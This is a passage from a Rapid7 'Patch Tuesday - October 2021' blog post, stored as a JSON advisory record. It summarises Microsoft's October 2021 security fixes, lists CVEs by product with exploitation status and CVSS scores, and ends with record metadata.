Windows, Edge, and Office, to Exchange, SharePoint, and Dynamics, there is plenty of patching to do for workstation and server administrators alike.\n\nOne vulnerability has already been seen exploited in the wild: [CVE-2021-40449](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40449>) is an elevation of privilege vulnerability in all supported versions of Windows, including the newly released Windows 11. Rated as Important, this is likely being used alongside Remote Code Execution (RCE) and/or social engineering attacks to gain more complete control of targeted systems.\n\nThree CVEs were publicly disclosed before today, though haven\u2019t yet been observed in active exploitation. [CVE-2021-40469](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40469>) is an RCE vulnerability affecting Microsoft DNS servers, [CVE-2021-41335](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41335>) is another privilege escalation vulnerability in the Windows Kernel, and [CVE-2021-41338](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41338>) is a flaw in Windows AppContainer allowing attackers to bypass firewall rules.\n\nAttackers will likely be paying attention to the latest Windows Print Spooler vulnerability \u2013 [CVE-2021-36970](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36970>) is a Spoofing vulnerability with a CVSSv3 score of 8.8 that we don\u2019t yet have much more information about. Also worth noting is [CVE-2021-40486](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40486>), an RCE affecting Microsoft Word, OWA, as well as SharePoint Server, which can be exploited via the Preview Pane. [CVE-2021-40487](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40487>) is another RCE affecting SharePoint Server that Microsoft expects to be exploited before too long.\n\nAnother notable vulnerability is [CVE-2021-26427](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26427>), the latest in Exchange Server RCEs. The severity is mitigated by the fact that attacks are limited to a \u201clogically adjacent topology,\u201d meaning that it cannot be exploited directly over the public Internet. Three other vulnerabilities related to Exchange Server were also patched: [CVE-2021-41350](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41350>), a Spoofing vulnerability; [CVE-2021-41348](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41348>), allowing elevation of privilege; and [CVE-2021-34453](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34453>), which is a Denial of Service vulnerability.\n\nFinally, virtualization administrators should be aware of two RCEs affecting Windows Hyper-V: [CVE-2021-40461](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40461>) and [CVE-2021-38672](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38672>). Both affect relatively new versions of Windows and are considered Critical, allowing a VM to escape from guest to host by triggering a memory allocation error, allowing it to read kernel memory in the host.\n\n## Summary Charts\n\n\n\n## Summary Tables\n\n### Apps Vulnerabilities\n\nCVE | Title | Exploited | Publicly Disclosed? | CVSSv3 Base Score | has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-41363](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41363>) | Intune Management Extension Security Feature Bypass Vulnerability | No | No | 4.2 | Yes \n \n### Browser Vulnerabilities\n\nCVE | Title | Exploited | Publicly Disclosed? | CVSSv3 Base Score | has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-37980](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-37980>) | Chromium: CVE-2021-37980 Inappropriate implementation in Sandbox | No | No | N/A | Yes \n[CVE-2021-37979](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-37979>) | Chromium: CVE-2021-37979 Heap buffer overflow in WebRTC | No | No | N/A | Yes \n[CVE-2021-37978](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-37978>) | Chromium: CVE-2021-37978 Heap buffer overflow in Blink | No | No | N/A | Yes \n[CVE-2021-37977](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-37977>) | Chromium: CVE-2021-37977 Use after free in Garbage Collection | No | No | N/A | Yes \n[CVE-2021-37976](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-37976>) | Chromium: CVE-2021-37976 Information leak in core | No | No | N/A | Yes \n[CVE-2021-37975](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-37975>) | Chromium: CVE-2021-37975 Use after free in V8 | No | No | N/A | Yes \n[CVE-2021-37974](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-37974>) | Chromium: CVE-2021-37974 Use after free in Safe Browsing | No | No | N/A | Yes \n \n### Developer Tools Vulnerabilities\n\nCVE | Title | Exploited | Publicly Disclosed? | CVSSv3 Base Score | has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-3450](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-3450>) | OpenSSL: CVE-2021-3450 CA certificate check bypass with X509_V_FLAG_X509_STRICT | No | No | N/A | Yes \n[CVE-2021-3449](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-3449>) | OpenSSL: CVE-2021-3449 NULL pointer deref in signature_algorithms processing | No | No | N/A | Yes \n[CVE-2020-1971](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1971>) | OpenSSL: CVE-2020-1971 EDIPARTYNAME NULL pointer de-reference | No | No | N/A | Yes \n[CVE-2021-41355](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41355>) | .NET Core and Visual Studio Information Disclosure Vulnerability | No | No | 5.7 | Yes \n \n### ESU Windows Vulnerabilities\n\nCVE | Title | Exploited | Publicly Disclosed? | CVSSv3 Base Score | has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-38663](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38663>) | Windows exFAT File System Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-40465](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40465>) | Windows Text Shaping Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-36953](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36953>) | Windows TCP/IP Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-40460](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40460>) | Windows Remote Procedure Call Runtime Security Feature Bypass Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-36970](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36970>) | Windows Print Spooler Spoofing Vulnerability | No | No | 8.8 | No \n[CVE-2021-41332](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41332>) | Windows Print Spooler Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-41331](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41331>) | Windows Media Audio Decoder Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-41342](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41342>) | Windows MSHTML Platform Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-41335](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41335>) | Windows Kernel Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-40455](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40455>) | Windows Installer Spoofing Vulnerability | No | No | 5.5 | No \n[CVE-2021-26442](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26442>) | Windows HTTP.sys Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-41340](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41340>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-38662](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38662>) | Windows Fast FAT File System Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-41343](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41343>) | Windows Fast FAT File System Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-40469](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40469>) | Windows DNS Server Remote Code Execution Vulnerability | No | Yes | 7.2 | Yes \n[CVE-2021-40443](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40443>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-40466](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40466>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-40467](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40467>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-40449](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40449>) | Win32k Elevation of Privilege Vulnerability | Yes | No | 7.8 | No \n[CVE-2021-40489](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40489>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n### Exchange Server Vulnerabilities\n\nCVE | Title | Exploited | Publicly Disclosed? | CVSSv3 Base Score | has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-41350](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41350>) | Microsoft Exchange Server Spoofing Vulnerability | No | No | 6.5 | No \n[CVE-2021-26427](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26427>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9 | Yes \n[CVE-2021-41348](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41348>) | Microsoft Exchange Server Elevation of Privilege Vulnerability | No | No | 8 | No \n[CVE-2021-34453](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34453>) | Microsoft Exchange Server Denial of Service Vulnerability | No | No | 7.5 | No \n \n### Microsoft Dynamics Vulnerabilities\n\nCVE | Title | Exploited | Publicly Disclosed? | CVSSv3 Base Score | has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-40457](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40457>) | Microsoft Dynamics 365 Customer Engagement Cross-Site Scripting Vulnerability | No | No | 7.4 | Yes \n[CVE-2021-41353](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41353>) | Microsoft Dynamics 365 (on-premises) Spoofing Vulnerability | No | No | 5.4 | No \n[CVE-2021-41354](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41354>) | Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability | No | No | 4.1 | No \n \n### Microsoft Office Vulnerabilities\n\nCVE | Title | Exploited | Publicly Disclosed? | CVSSv3 Base Score | has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-40486](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40486>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-40484](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40484>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 7.6 | No \n[CVE-2021-40483](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40483>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 7.6 | No \n[CVE-2021-41344](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41344>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.1 | No \n[CVE-2021-40487](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40487>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2021-40482](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40482>) | Microsoft SharePoint Server Information Disclosure Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-40480](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40480>) | Microsoft Office Visio Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-40481](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40481>) | Microsoft Office Visio Remote Code Execution Vulnerability | No | No | 7.1 | Yes \n[CVE-2021-40471](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40471>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-40473](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40473>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-40474](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40474>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-40479](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40479>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-40485](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40485>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-40472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40472>) | Microsoft Excel Information Disclosure Vulnerability | No | No | 5.5 | Yes \n \n### Microsoft Office Windows Vulnerabilities\n\nCVE | Title | Exploited | Publicly Disclosed? | CVSSv3 Base Score | has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-40454](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40454>) | Rich Text Edit Control Information Disclosure Vulnerability | No | No | 5.5 | Yes \n \n### System Center Vulnerabilities\n\nCVE | Title | Exploited | Publicly Disclosed? | CVSSv3 Base Score | has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-41352](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41352>) | SCOM Information Disclosure Vulnerability | No | No | 7.5 | Yes \n \n### Windows Vulnerabilities\n\nCVE | Title | Exploited | Publicly Disclosed? | CVSSv3 Base Score | has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-40464](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40464>) | Windows Nearby Sharing Elevation of Privilege Vulnerability | No | No | 8 | No \n[CVE-2021-40463](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40463>) | Windows NAT Denial of Service Vulnerability | No | No | 7.7 | No \n[CVE-2021-40462](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40462>) | Windows Media Foundation Dolby Digital Atmos Decoders Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-41336](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41336>) | Windows Kernel Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-38672](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38672>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 8 | Yes \n[CVE-2021-40461](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40461>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 8 | No \n[CVE-2021-40477](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40477>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-41334](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41334>) | Windows Desktop Bridge Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-40475](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40475>) | Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-40468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40468>) | Windows Bind Filter Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-41347](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41347>) | Windows AppX Deployment Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-41338](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41338>) | Windows AppContainer Firewall Rules Security Feature Bypass Vulnerability | No | Yes | 5.5 | No \n[CVE-2021-40476](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40476>) | Windows AppContainer Elevation Of Privilege Vulnerability | No | No | 7.5 | No \n[CVE-2021-40456](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40456>) | Windows AD FS Security Feature Bypass Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-40450](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40450>) | Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-41357](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41357>) | Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-40478](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40478>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-40488](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40488>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26441](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26441>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-41345](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41345>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-41330](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41330>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-41339](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41339>) | Microsoft DWM Core Library Elevation of Privilege Vulnerability | No | No | 4.7 | No \n[CVE-2021-40470](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40470>) | DirectX Graphics Kernel Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-41346](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41346>) | Console Window Host Security Feature Bypass Vulnerability | No | No | 5.3 | No \n[CVE-2021-41337](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41337>) | Active Directory Security Feature Bypass Vulnerability | No | No | 4.9 | Yes \n[CVE-2021-41361](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41361>) | Active Directory Federation Server Spoofing Vulnerability | No | No | 5.4 | Yes", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2021-10-12T19:47:16", "type": "rapid7blog", "title": "Patch Tuesday - October 2021", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1971", "CVE-2021-26427", "CVE-2021-26441", "CVE-2021-26442", "CVE-2021-34453", "CVE-2021-3449", "CVE-2021-3450", "CVE-2021-36953", "CVE-2021-36970", "CVE-2021-37974", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-37977", "CVE-2021-37978", "CVE-2021-37979", "CVE-2021-37980", "CVE-2021-38662", "CVE-2021-38663", "CVE-2021-38672", "CVE-2021-40443", "CVE-2021-40449", "CVE-2021-40450", "CVE-2021-40454", "CVE-2021-40455", "CVE-2021-40456", "CVE-2021-40457", "CVE-2021-40460", "CVE-2021-40461", "CVE-2021-40462", "CVE-2021-40463", "CVE-2021-40464", "CVE-2021-40465", "CVE-2021-40466", "CVE-2021-40467", "CVE-2021-40468", "CVE-2021-40469", "CVE-2021-40470", "CVE-2021-40471", "CVE-2021-40472", "CVE-2021-40473", "CVE-2021-40474", "CVE-2021-40475", "CVE-2021-40476", "CVE-2021-40477", "CVE-2021-40478", "CVE-2021-40479", "CVE-2021-40480", "CVE-2021-40481", "CVE-2021-40482", "CVE-2021-40483", "CVE-2021-40484", "CVE-2021-40485", "CVE-2021-40486", "CVE-2021-40487", "CVE-2021-40488", "CVE-2021-40489", "CVE-2021-41330", "CVE-2021-41331", "CVE-2021-41332", "CVE-2021-41334", "CVE-2021-41335", "CVE-2021-41336", "CVE-2021-41337", "CVE-2021-41338", "CVE-2021-41339", "CVE-2021-41340", "CVE-2021-41342", "CVE-2021-41343", "CVE-2021-41344", "CVE-2021-41345", "CVE-2021-41346", "CVE-2021-41347", "CVE-2021-41348", "CVE-2021-41350", "CVE-2021-41352", "CVE-2021-41353", "CVE-2021-41354", "CVE-2021-41355", "CVE-2021-41357", "CVE-2021-41361", "CVE-2021-41363"], "modified": "2021-10-12T19:47:16", "id": "RAPID7BLOG:73EAE8A2825E9B6764F314122B4E5F25", "href": "https://blog.rapid7.com/2021/10/12/patch-tuesday-october-2021/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}